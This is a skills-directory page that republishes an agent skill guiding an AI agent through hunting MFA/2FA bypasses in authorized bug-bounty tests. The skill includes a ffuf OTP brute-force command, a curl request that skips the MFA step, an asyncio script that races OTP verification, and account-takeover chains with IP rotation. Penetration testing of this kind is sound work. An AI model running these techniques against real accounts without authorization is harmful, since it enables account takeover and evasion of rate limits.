Agent skill

Hunt Mfa Bypass

by sickn33 in sickn33/agentic-awesome-skills

“Hunt MFA / 2FA bypass”

— description from SKILL.md by sickn33
MITAuto-check passed

Install Hunt Mfa Bypass

skills CLI
$ npx skills add sickn33/agentic-awesome-skills --skill hunt-mfa-bypass -a claude-code

Project install by default; add -g for ~/.claude/skills/.

GitHub CLI
$ gh skill install sickn33/agentic-awesome-skills hunt-mfa-bypass --agent claude-code

Project scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).

Manual copy
$ git clone --depth 1 https://github.com/sickn33/agentic-awesome-skills.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/hunt-mfa-bypass .claude/skills/hunt-mfa-bypass && rm -rf skills-src

Use ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.

Claude Code skills documentation · loads skills from .claude/skills/

Facts

Skill name
hunt-mfa-bypass
GitHub stars
47k
Used in
1 other repo
Token cost
~2.6k tokens
SKILL.md length
985 words
Files
1
Skills in repo
1,497
Repo updated
First seen
Licence
MIT

At a glance

  • Works in 3 steps: Login with valid credentials → receive a… → Without completing MFA, directly access… → If the response returns user data → MFA…
  • SKILL.md covers Autonomous Testing Priority, 19. MFA / 2FA BYPASS, Related Skills & Chains and When to Use, plus 1 more section
  • Calls curl

About this skill

Hunt Mfa Bypass is a skill in sickn33/agentic-awesome-skills (47k stars). Its SKILL.md is about 2.6k tokens, and copies of it appear in 1 other owners' repositories. Licence: MIT.

Requirements

  • Compatibility (from SKILL.md): Requires explicit written authorization for a target scope plus the relevant testing tools for this technique. Docs-only; helper scripts and commands not bundled.

Workflow steps

3 steps, taken from the first numbered list in SKILL.md.

  1. Login with valid credentials → receive a "pre-MFA" session state
  2. Without completing MFA, directly access a protected resource (/dashboard, /api/me, /account/profile)
  3. If the response returns user data → MFA is enforced only in the UI, not server-side = Critical

What it can do on your machine

Read from SKILL.md and the folder at commit b84d35a. It shows what the files ask for, not the result of running them.

  • Tool permissions

    Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.

    From allowed-tools in the SKILL.md frontmatter.

  • Runs code

    Shell commands in SKILL.md call:

    • curl

    From the folder's file list and the shell code blocks in SKILL.md.

  • Network

    Links to these hosts (documentation or services it may open):

    • github.com

    From URLs in SKILL.md, links to its own repository left out.

  • Credentials

    Names no API keys, tokens, secrets or passwords.

    From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.

  • Compatibility

    Requires explicit written authorization for a target scope plus the relevant testing tools for this technique. Docs-only; helper scripts and commands not bundled.

    From compatibility in the SKILL.md frontmatter.

Context cost

Hunt Mfa Bypass loads about 2.6k tokens when it runs. Until then it costs about 9 tokens; SKILL.md has 985 words of instructions outside code blocks.

Always · name and description, kept in context so the agent knows when to use it
~9
When it runs · the whole SKILL.md, loaded when a task matches
~2.6k

Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.

Safety

Auto-check passed

The automated check found no risky patterns in SKILL.md.

Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.

SKILL.md

The full file from sickn33/agentic-awesome-skills at commit b84d35a, republished under its MIT licence (© sickn33). 985 words, ~2,604 tokens.

Download SKILL.mdSave it as .claude/skills/hunt-mfa-bypass/SKILL.md (or your agent's skills folder).
name
hunt-mfa-bypass
description
Hunt MFA / 2FA bypass
compatibility
Requires explicit written authorization for a target scope plus the relevant testing tools for this technique. Docs-only; helper scripts and commands not bundled.
category
security
risk
offensive
source
https://github.com/elementalsouls/Claude-BugHunter
source_repo
elementalsouls/Claude-BugHunter
source_type
community
date_added
2026-09-20
license
MIT
license_source
https://github.com/elementalsouls/Claude-BugHunter/blob/main/LICENSE
sources
hackerone_public, cve_database, nist_800_63b, public_research
report_count
5

⚠️ AUTHORIZED USE ONLY This skill is for educational purposes or authorized security assessments only. You must have explicit, written permission from the system owner before using this tool. Misuse of this tool is illegal and strictly prohibited.

Mandatory confirmation gate Before running any command that probes, exploits, changes, persists on, extracts data from, or attempts credential access against a target:

  1. Ask the user to state the exact target URL, IP, account, or resource.
  2. Ask the user to confirm written authorization and the permitted scope.
  3. Show the exact command(s) and explain their expected effect.
  4. Wait for explicit confirmation in the current conversation.

Without that confirmation, remain read-only and provide defensive guidance only. Prefer a sandbox, disposable VM, or controlled lab.

Autonomous Testing Priority

Try workflow bypasses before brute force — they're faster and more likely to succeed.

Pattern 1 — Skip the MFA step entirely (most automatable):

  1. Login with valid credentials → receive a "pre-MFA" session state
  2. Without completing MFA, directly access a protected resource (/dashboard, /api/me, /account/profile)
  3. If the response returns user data → MFA is enforced only in the UI, not server-side = Critical

Pattern 2 — OTP replay (reuse a consumed code):

  1. Complete a valid MFA flow to get a working OTP
  2. Log out, log in again with the same credentials
  3. Submit the same OTP again
  4. If accepted → OTP is not invalidated after use

Pattern 3 — Submit obviously wrong OTP, observe response: Try submitting 000000 or 123456. If the response is 200 or returns a session token, OTP validation is broken or client-side only.

Pattern 4 — Partial / incremental validation (prefix oracle): If a guessed full code is rejected, test whether the server validates the OTP prefix-by-prefix instead of all-or-nothing. Submit a short partial code and compare responses:

  1. Submit a 1–3 digit value (e.g. otp=1, then otp=12, …) — for a POST verify endpoint the code goes in the request body, not the URL query string, or the server reads an empty value.
  2. If a correct prefix gives a DIFFERENT response than a wrong one (a success/flag, a distinct message, or a different length/timing), the validator leaks correctness one chunk at a time.
  3. Walk the code digit-by-digit: keep the prefix that "responds correct," append 0–9, repeat. This collapses 10^6 brute force to ~10×N guesses (≤60 for a 6-digit code) — very feasible in a bounded test. This is the go-to when there is no leaked code and no skip/replay path. Some apps award success on any correct prefix outright (so a single correct first digit can win — sweep otp=0,1,…,9 before giving up). CRITICAL — stay in ONE session: re-authenticating (POST /…/login again) regenerates the OTP, throwing away your prefix progress. Do the entire sweep against a single established MFA session; never re-login between guesses.

On full brute force: brute-forcing all 10^6 codes is infeasible in a bounded test — but the prefix oracle above (Pattern 4) usually makes it unnecessary. Only attempt full brute force with evidence of no rate limit AND a small key space.

Proof: A session token or protected resource data in the response without completing MFA confirms the bypass.


19. MFA / 2FA BYPASS

Growing bug class — 7 distinct patterns. Pays High/Critical when it enables ATO without prior session.

Pattern 1: No Rate Limit on OTP
bash
# Test with ffuf — all 1M 6-digit codes
ffuf -u "https://target.com/api/verify-otp" \
  -X POST -H "Content-Type: application/json" \
  -H "Cookie: session=YOUR_SESSION" \
  -d '{"otp":"FUZZ"}' \
  -w <(seq -w 000000 999999) \
  -fc 400,429 -t 5
# -t 5 (slow down) — aggressive rates get 429 or ban
Pattern 2: OTP Not Invalidated After Use
1. Login → receive OTP "123456" → enter it → success
2. Logout → login again with same credentials
3. Try OTP "123456" again
4. If accepted → OTP never invalidated = ATO (attacker sniffs OTP once, reuses forever)
Pattern 3: Response Manipulation
1. Enter wrong OTP → capture response in Burp
2. Change {"success":false} → {"success":true} (or 401 → 200)
3. Forward → if app proceeds → client-side only MFA check
Pattern 4: Skip MFA Step (Workflow Bypass)
bash
# After entering password, app sets a "pre-mfa" cookie → redirects to /mfa
# Test: skip /mfa entirely, access /dashboard directly with pre-mfa cookie
# If app grants access without MFA = auth flow bypass = Critical
curl -s -b "session=PRE_MFA_SESSION" https://target.com/dashboard
Pattern 5: Race on MFA Verification
python
import asyncio, aiohttp

async def verify(session, otp):
    async with session.post("https://target.com/api/mfa/verify",
                            json={"otp": otp}) as r:
        return r.status, await r.text()

async def race():
    cookies = {"session": "YOUR_SESSION"}
    async with aiohttp.ClientSession(cookies=cookies) as s:
        # Fire ~30 concurrent submissions of the SAME OTP to hit the TOCTOU
        # window before the server marks it used. Two requests are NOT enough —
        # they almost always resolve sequentially as "already-used" (false negative).
        # Best done as a single-packet / 20+ HTTP-2-stream attack (Turbo Intruder).
        results = await asyncio.gather(*[verify(s, "123456") for _ in range(30)])
        # Race confirmed if >1 success (or 1 success among many "already-used").
        for status, body in results:
            print(status, body)
asyncio.run(race())
Pattern 6: Backup Code Brute Force
Backup codes: typically 8 alphanumeric = 36^8 = ~2.8T (too large)
BUT: check if backup codes are only 6-8 digits = 1-10M range = feasible with no rate limit
Also test: can backup codes be reused after exhaustion? Some apps regenerate predictably.
Pattern 7: "Remember This Device" Trust Escalation
1. Complete MFA once on Device A (attacker's browser)
2. Capture the "remember device" cookie
3. Present that cookie from a new IP/browser
4. If MFA skipped = device trust not bound to IP/UA = ATO from any location
MFA Chain Escalation
Rate limit bypass + no lockout = ATO (Critical)
Response manipulation = client-side only check = Critical
Skip MFA step = auth flow bypass = Critical
OTP reuse = persistent session hijack = High

Show full SKILL.md (402 more words)Show less
  • hunt-ato — MFA bypass is a primitive; ATO is the destination. Chain primitive: cookie theft (via XSS or session-fixation) + password oracle (login response timing/length diff reveals valid passwords without lockout) + no MFA step-up on password-change endpoint = persistent ATO without ever facing the OTP challenge → password rotated, attacker locks victim out.
  • hunt-race-condition — Pattern 5 (OTP race) lives in race-condition territory; load both skills together. Chain primitive: same 6-digit OTP submitted via 20 parallel HTTP/2 streams (single-packet Turbo Intruder attack) before the server marks it used → 1 success + 19 "already-used" → race window confirmed → attacker doesn't need to brute, just guesses once and parallelizes → ATO.
  • hunt-auth-bypass — MFA-step-skip is auth-flow bypass at the workflow layer. Chain primitive: pre-MFA cookie issued after password step + direct navigation to /dashboard skipping /mfa route + server only middleware-gates /mfa not /dashboard = full post-auth access from password-only state → MFA never enforced because the route gate was misplaced.
  • hunt-misc — Recovery-code dump via /api/me is a misc-class info disclosure that becomes Critical when chained. Chain primitive: /api/me returns full user object including backup_codes array (plaintext, never rotated) → attacker with any read-IDOR or XSS exfils backup codes → uses one backup code → MFA satisfied → ATO without OTP knowledge.
  • security-arsenal — Pull the OTP-brute-force payload section (000000-999999 wordlist generator, ffuf rate-limit-evasion patterns with -t 5 -p 0.5-2, distributed-IP rotation via proxychains) and the JWT-token-replay table when "MFA satisfied" claim lives in a JWT claim that can be forged.
  • triage-validation — Run the Pre-Severity Gate before claiming Critical on an MFA bypass that only works when the attacker already has the password. Standalone MFA bypass is High; chained-with-password-oracle is Critical; chained-with-cookie-theft-only is Critical. The chain question separates the two.

When to Use

  • You have explicit, written authorization to assess the target in scope, and the task matches this skill's vulnerability class or technique within a bug-bounty or penetration-test engagement.
  • You need the recon, exploitation, or validation workflow described below — executed strictly inside the approved scope.

Limitations

  • Authorized scope only: the confirmation gate above is mandatory before any probing, exploitation, or credential-access command.
  • Docs-only import: upstream helper scripts, commands, engine, and research assets are not bundled; reinstall tooling from the source repo when needed.
  • Validate every finding (see triage-validation) before reporting; report via report-writing. Prefer a sandbox, disposable VM, or controlled lab.
Example
bash
# Read-only first step; confirm scope before anything active.
cat scope.txt  # target list from the authorized engagement brief

Adapted from elementalsouls/Claude-BugHunter (MIT); frontmatter, When to Use/Limitations, and safety boundaries added for upstream compliance. Docs-only import: executable helpers, commands, engine, and research assets not bundled.

© sickn33, MIT. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file

Files

Just SKILL.md in skills/hunt-mfa-bypass of sickn33/agentic-awesome-skills.

Open the folder on GitHubat commit b84d35a

Used in 1 other repository

We found 5 copies of this SKILL.md (exact, near-identical or edited) in other folders, from 1 other GitHub owner. This page covers the copy in sickn33/agentic-awesome-skills, which our catalogue first saw on October 7, 2026.

Compare with similar skills

Hunt Mfa Bypass next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.

Hunt Mfa Bypass compared with similar skills
SkillStarsUsed inTokensAuto-checkLicenceRepo updated
Hunt Mfa Bypass this skillsickn33/agentic-awesome-skills47k1 repos~2.6kAutomated safety check: PassMIT
Hunt Auth Bypasselementalsouls/Claude-BugHunter4.8k—~8.2kAutomated safety check: PassMIT
Hunt Captcha Bypasselementalsouls/Claude-BugHunter4.8k—~1.5kAutomated safety check: PassMIT
Threat Huntingzhaoxuya520/reverse-skill41k2 repos~344Automated safety check: WarnMIT
Secops Huntgoogle/skills21k1 repos~2.6kAutomated safety check: PassApache-2.0
Hunting For Spearphishing Indicatorsmukul975/Anthropic-Cybersecurity-Skills34k—~1kAutomated safety check: PassApache-2.0

Similar skills

  • Hunt Auth Bypass

    elementalsouls/Claude-BugHunter

    Hunting skill for auth bypass vulnerabilities. An agent skill from elementalsouls/Claude-BugHunter.

    4.8k GitHub stars~8.2k tokensUpdated yesterday
    SecurityAuto-check passed
  • Hunt Captcha Bypass

    elementalsouls/Claude-BugHunter

    Hunt CAPTCHA Bypass — 6 distinct patterns: (1) CAPTCHA field simply omitted from the request (server-side validation absent), (2) CAPTCHA token replayed from a solved challenge (no single-use…

    4.8k GitHub stars~1.5k tokensUpdated yesterday
    Backend & APIsAuto-check passed
  • Threat Hunting

    zhaoxuya520/reverse-skill

    A skill your agent uses for blue-team threat hunting, detection engineering with Sigma/YARA, SIEM query design, and incident detection validation.

    41k GitHub starsUsed in 2 repos~344 tokens
    SecurityAuto-check: warnings
  • Secops Hunt

    google/skills

    Official

    Expert guidance for proactive threat hunting in Google SecOps.

    21k GitHub starsUsed in 1 repo~2.6k tokens
    SecurityAuto-check passed
  • Hunting For Spearphishing Indicators

    mukul975/Anthropic-Cybersecurity-Skills

    Hunt for spearphishing campaign indicators across email logs, endpoint telemetry, and network data to detect targeted email attacks.

    34k GitHub stars~1k tokensUpdated 1 mo ago
    SecurityAuto-check passed
  • Hunting For Webshell Activity

    mukul975/Anthropic-Cybersecurity-Skills

    Runs a hypothesis-driven threat hunt for web shell deployment (T1505.003) on internet-facing servers by analyzing file creation in web directories, suspicious child-process spawning from web server…

    34k GitHub stars~904 tokensUpdated 1 mo ago
    SecurityAuto-check passed

More from sickn33/agentic-awesome-skills

All 1,497 skills in this repo
  • Liuguang Banlan UI

    sickn33/agentic-awesome-skills

    Implements an interface in one of two named color modes, iridescent white or colorful black, from a parameterized starter that reports measured color intensity.

    47k GitHub starsUsed in 1 repo~2.5k tokens
    Auto-check passed
  • User Thoughts Memory

    sickn33/agentic-awesome-skills

    Saves a user's project decisions, rules and preferences into a project-local mdbase so later sessions and other agents can recover the intent.

    47k GitHub starsUsed in 1 repo~2.5k tokens
    Auto-check passed
  • Using LWC Memory and Graphs

    sickn33/agentic-awesome-skills

    Keeps project decisions, research and verified results available across coding-agent sessions through LWC memory, a document Wiki graph and a CodeGraph code index.

    47k GitHub starsUsed in 1 repo~2k tokens
    Auto-check passed
  • Find Complementary Founders

    sickn33/agentic-awesome-skills

    Guides an agent through assessing its own owner for cofounder fit, publishing an approved profile, and ranking complementary profiles other agents published for their owners.

    47k GitHub starsUsed in 1 repo~4.8k tokens
    Auto-check passed
  • Whatsapp Cloud API

    sickn33/agentic-awesome-skills

    Integracao com WhatsApp Business Cloud API (Meta). An agent skill from sickn33/agentic-awesome-skills.

    47k GitHub starsUsed in 2 repos~4.5k tokens
    Auto-check passed
  • Cline Pilot

    sickn33/agentic-awesome-skills

    Acts as a proxy for the Cline CLI, dispatching coding tasks one at a time, monitoring runs by hard evidence, relaying decisions to you and learning per-project preferences.

    47k GitHub starsUsed in 1 repo~4.6k tokens
    Auto-check passed

Questions about Hunt Mfa Bypass

How do I install Hunt Mfa Bypass in Claude Code?

Run `npx skills add sickn33/agentic-awesome-skills --skill hunt-mfa-bypass -a claude-code`. Or copy the skill folder (skills/hunt-mfa-bypass in sickn33/agentic-awesome-skills) into .claude/skills/hunt-mfa-bypass in your project. Claude Code loads it when a task matches its description.

How do I install Hunt Mfa Bypass in Codex?

Run `npx skills add sickn33/agentic-awesome-skills --skill hunt-mfa-bypass -a codex`. Or copy the skill folder (skills/hunt-mfa-bypass in sickn33/agentic-awesome-skills) into .agents/skills/hunt-mfa-bypass in your project. Codex loads it when a task matches its description.

Can I use Hunt Mfa Bypass in Cursor, Gemini CLI or GitHub Copilot?

Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add sickn33/agentic-awesome-skills --skill hunt-mfa-bypass -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/hunt-mfa-bypass, .gemini/skills/hunt-mfa-bypass, .github/skills/hunt-mfa-bypass and .opencode/skills/hunt-mfa-bypass in your project.

What does Hunt Mfa Bypass need to run?

Going by SKILL.md and its folder, Hunt Mfa Bypass needs the command-line tools its instructions call (curl). Compatibility (from SKILL.md): Requires explicit written authorization for a target scope plus the relevant testing tools for this technique. Docs-only; helper scripts and commands not bundled..

Does Hunt Mfa Bypass access the network?

SKILL.md names 1 domain. As links in the text: github.com. This is read from the text; nothing was executed.

Is Hunt Mfa Bypass safe to install?

Our automated static check of SKILL.md found no risky patterns, such as piping downloads into a shell, reading credential files or hidden Unicode. It is not a guarantee. Review the folder before installing.

What licence does Hunt Mfa Bypass use?

Hunt Mfa Bypass is published under the MIT licence (declared in SKILL.md). It allows redistribution, so the full SKILL.md is shown on this page.

How many tokens does Hunt Mfa Bypass use?

About 2.6k tokens (SKILL.md is roughly 10k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full.

What are the alternatives to Hunt Mfa Bypass?

Skills that share tags, products or a category with Hunt Mfa Bypass: Hunt Auth Bypass (elementalsouls/Claude-BugHunter, 4.8k stars), Hunt Captcha Bypass (elementalsouls/Claude-BugHunter, 4.8k stars), Threat Hunting (zhaoxuya520/reverse-skill, 41k stars) and Secops Hunt (google/skills, 21k stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.

Who maintains Hunt Mfa Bypass?

sickn33 (a GitHub user) maintains it in sickn33/agentic-awesome-skills, which has 47,405 GitHub stars. The repository holds 1,497 skills in this directory. The repository was last updated on October 9, 2026.

Source: sickn33/agentic-awesome-skills on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.